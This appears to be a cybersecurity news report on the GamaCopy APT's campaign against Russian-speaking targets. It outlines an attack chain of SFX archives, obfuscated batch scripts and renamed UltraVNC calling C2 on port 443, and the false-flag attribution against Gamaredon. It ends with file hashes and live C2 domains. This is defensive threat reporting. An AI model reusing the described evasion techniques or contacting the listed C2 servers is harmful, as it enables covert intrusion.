Cybersecurity researchers have recently uncovered a series of targeted attacks leveraging military-related content as bait to exploit Russian-speaking victims.
These findings shed light on a sophisticated campaign orchestrated by the GamaCopy APT group, an organization known for mirroring the tactics, techniques, and procedures (TTPs) of Gamaredon, a group primarily focused on attacking Ukrainian entities.
Through detailed analysis, researchers have established significant technical differences between Gamaredon and GamaCopy, attributing the observed attack activity to the latter.
The operation begins with the use of bait documents detailing Russian military facilities.
Upon execution, the attackers employ a 7z self-extracting (SFX) archive to extract a series of payloads.
These payloads include obfuscated batch scripts designed to copy and execute specific files among them, a renamed version of the open-source remote desktop tool UltraVNC.
UltraVNC is disguised under a legitimate-sounding process name and connected to a predefined command-and-control (C2) server over port 443, enhancing the attackers’ ability to evade detection.
Notably, the attackers have incorporated sophisticated obfuscation techniques, such as delayed variable expansion, to complicate static analysis.
Attribution to GamaCopy and Its False-Flag Strategies
While Gamaredon has historically employed SFX and UltraVNC in its campaigns, close examination of the current attack chain reveals significant deviations.
For example, Gamaredon often uses macros or VBS scripts to deliver subsequent payloads, and its UltraVNC-related activities frequently leverage port 5612.
By contrast, the GamaCopy group deploys UltraVNC via SFX archives, connects through port 443, and consistently uses Russian-language bait documents targeting sensitive sectors such as Russia’s Ministry of Foreign Affairs and defense-critical organizations.
The use of Russian-language bait documents, as opposed to Gamaredon’s tendency to use Ukrainian-language content, reinforces the attribution to GamaCopy.
This group, first identified in June 2023, is believed to have been active since 2021, regularly mimicking Gamaredon’s TTPs to sow confusion and mount false-flag operations.
By leveraging open-source tools like UltraVNC and crafting complex attack chains, GamaCopy seeks to obscure its origins and exploit the geopolitical “fog of war” in the ongoing Russia-Ukraine conflict.
Context and Strategic Implications
The GamaCopy campaign highlights a concerning trend in cyber warfare, where adversaries use publicly available tools and mimic the tactics of established threat groups to evade attribution.
With its apparent focus on targeting Russian defense and critical infrastructure sectors, GamaCopy has emerged as a notable actor in the cyber domain.
Its craftiness in blending false-flag operations, strategic language selection, and advanced evasion techniques underscores the complexity of modern APT campaigns.
The analysis identified several hashes and C2 servers associated with the campaign.
Among the hashes are: c9ffc90487ddcb4bb0540ea4e2a1ce040740371bb0f3ad70e36824d486058349 and 2da473d1f510d0ddbae074a6c13953863c25be479acedc899c5529ec55bd2a65.
The C2 servers, including nefteparkstroy.ru:443 and fmsru.ru:443, were used for communication between infected systems and the attackers.
This discovery underscores the importance of diligent threat-hunting efforts and in-depth analyses to detect and neutralize cyber campaigns designed to hide under layers of deception and mimicry.
